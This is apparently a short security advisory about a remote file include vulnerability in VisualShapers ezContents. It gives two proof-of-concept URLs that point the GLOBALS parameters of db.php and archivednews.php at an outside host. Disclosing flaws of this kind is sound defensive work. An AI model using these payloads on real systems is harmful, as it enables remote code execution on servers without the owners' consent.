VisualShapers ezContents Multiple Module File Include Vulnerability

info
discussion
exploit
solution
references

VisualShapers ezContents Multiple Module File Include Vulnerability

No exploit is required.

The following proof of concept has been provided:
http://www.example.com/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://www.example.com/
http://www.example.com/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://www.example.com/&GLOBALS[gsLanguage]=ezContents